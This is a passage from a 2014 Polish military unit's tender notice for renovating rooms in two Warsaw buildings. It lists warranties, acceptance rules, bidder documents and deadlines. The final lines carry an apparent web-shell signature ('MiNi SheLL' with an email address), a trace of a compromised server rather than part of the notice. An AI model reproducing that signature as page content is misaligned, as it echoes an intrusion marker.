Kontrola prawidłowości wykonania prac i powierzchni wykładzin dywanowych rulonowych i  PCW wielowarstwowych klejonych techniką kontaktową z wywinięciem wykładziny na ścianę na wys. 0,10 m.
Certyfikaty potwierdzające właściwości wykładzin PCV i dywanowych.
Kontrola prawidłowości wykonania podłogi podniesionej technicznej REI30, wykonania podkonstrukcji wzmacniającej na 100% pow.,montażu otworów rewizyjnych, kratki wentylacyjnej i puszki pod instalację elektryczną.
XIII.    ODBIÓR
Odbioru wykonania robót dokonuje się komisyjnie z udziałem z ramienia Zarządcy - Inspektor Nadzoru  wraz z przedstawicielem Administratora - Kierownika Rejonu P. Ewa JAKUBOWSKA w obecności przedstawiciela Użytkownika, przy współudziale Wykonawcy, na podstawie wizji lokalnej. 
Odbiór prac polega na stwierdzeniu zgodności prac z dokumentacją kosztorysową oraz jakością użytych materiałów i jakością wykonania robót.
Kontrola jakości prac to kontrola prawidłowości wykonania prac tynkarskich, malarskich i glazurniczych w pomieszczeniach sanitariatów, wykonanie prac posadzkarskich prawidłowości montażu wykładzin podłogowych. Prawidłowości montażu armatury łazienkowej i instalacji wodociągowej oraz c.o. wraz osprzętem. Prawidłowości rozbudowy instalacji zasilania oświetlenia i gniazd oraz budowy tablic rozdzielczych, montażu opraw oświetleniowych, puszek i gniazd energetycznych.  
Niezbędnym elementem dokonania odbioru robót jest dostarczenie przez Wykonawcę stosownych certyfikatów oraz zgodności na użyte materiały oraz okazanie przez Wykonawcę dokumentu Asygnaty Przychodowej JW 4198, na przekazanie materiałów z demontażu do magazynu budowlanego. 
Zakres robót uważa się za odebrany z chwilą wykonania Protokołu Końcowego Odbioru Robót - bez uwag i komisyjnego złożenia podpisów. 
XVI. GWARANCJA WYKONANIA
Gwarancje na wykonane prace:     
 - odnośnie wymienionych drzwi - na sztywność, niezawodność okuć, nieodkształcenia profili  - minimum 120 miesięcy,
-   na trwałość i funkcjonalność elementów z ceramiki i armatury wyposażenia pom. sanitariatów - wg gwarancji producenta, 
 -  na wykonanie i montaż oraz sprawność techniczną zgodnie z opisem drzwi do kabin oraz kabiny natryskowej w pom. sanitariatów - 36 miesięcy,
-na trwałość połączenia płytek podłogowych z podłożem i płytek ściennych z tynkiem - 60 miesięcy,
- na trwałość wykonanych prac tynkarskich wewnętrznych - 36 miesięcy,
 - na trwałość wykonanych prac malarskich - 36 miesięcy,
 -  na trwałość wykładzin dywanowych rulonowych i  PCW wielowarstwowych klejonych techniką kontaktową - wg gwarancji producenta,
 -na trwałość i funkcjonalność elementów podłogi podniesionej technicznej REI30- demontowalnej z płyt anhydrytowych - wg gwarancji producenta.
Szczegółowy Opis przedmiotu zamówienia, przedmiar robot i SIWZ, znajduje się na stronie internetowej Zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.53.00-7, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oświadczeń lub dokumentów złożonych przez Wykonawcę w systemie,  spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oświadczeń lub dokumentów złożonych przez Wykonawcę w systemie,  spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oświadczeń lub dokumentów złożonych przez Wykonawcę w systemie,  spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oświadczeń lub dokumentów złożonych przez Wykonawcę w systemie,  spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oświadczeń lub dokumentów złożonych przez Wykonawcę w systemie,  spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">nie dotyczy</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z późn. zm.) - 
2.  Wykaz osób (pracowników), które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz o podstawie do dysponowania tymi osobami 
3. Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający wymaga co najmniej dwóch dowodów wykonania przedmiotu zamówieni
4. Oświadczenie o braku podstaw do wykluczenia - załącznik nr 5 do SIWZ. 
5. Świadectwo Bezpieczeństwa Przemysłowego co najmniej III stopnia o klauzuli TAJNE, zgodnie   z ustawą  z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2010 r., nr 182, poz. 1228) oraz Instrukcją Bezpieczeństwa Przemysłowego,
 6. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie   w zakresie art. 24 ust.1 pkt.2 ustawy.
7.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne  i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
10. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
11. Oświadczenie Wykonawcy o przynależności do grupy kapitałowej (art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych)
12. Oświadczenie Wykonawcy o przeprowadzonej wizji lokalnej w miejscu planowanych robót i zapoznaniu się z warunkami w jakich przeprowadzone będą prace.
13. Pełnomocnictwo do podpisania oferty, jeśli to nie wynika z innych dokumentów dołączonych do oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z załącznikiem nr 5 do SIWZ - Istotne warunki umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1bltr.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 50, pok. 4.</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> nie dotyczy.</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2014 godzina 10:00, miejsce: Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 51,  Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.	Zadanie nr 1 - Remont pomieszczeń w budynku nr 2 w kompleksie wojskowym przy ul. Leśnej  w Warszawie -wybrane pomieszczenia-..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zadanie nr 1 - Remont pomieszczeń w budynku nr 2 w kompleksie wojskowym przy ul. Leśnej  w Warszawie -wybrane pomieszczenia-.
Szczegółowy Opis przedmiotu zamówienia, przedmiar robot i SIWZ, znajduje się na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.53.00-3, 45.33.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Remont pomieszczeń w budynku nr 4 w kompleksie wojskowym przy ul. Leśnej 5 w Warszawie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 - Remont pomieszczeń w budynku nr 4 w kompleksie wojskowym przy ul. Leśnej 5 w Warszawie.Szczegółowy Opis przedmiotu zamówienia, przedmiar robot i SIWZ, znajduje się na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.53.00-7, 45.31.00.00-3, 45.33.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com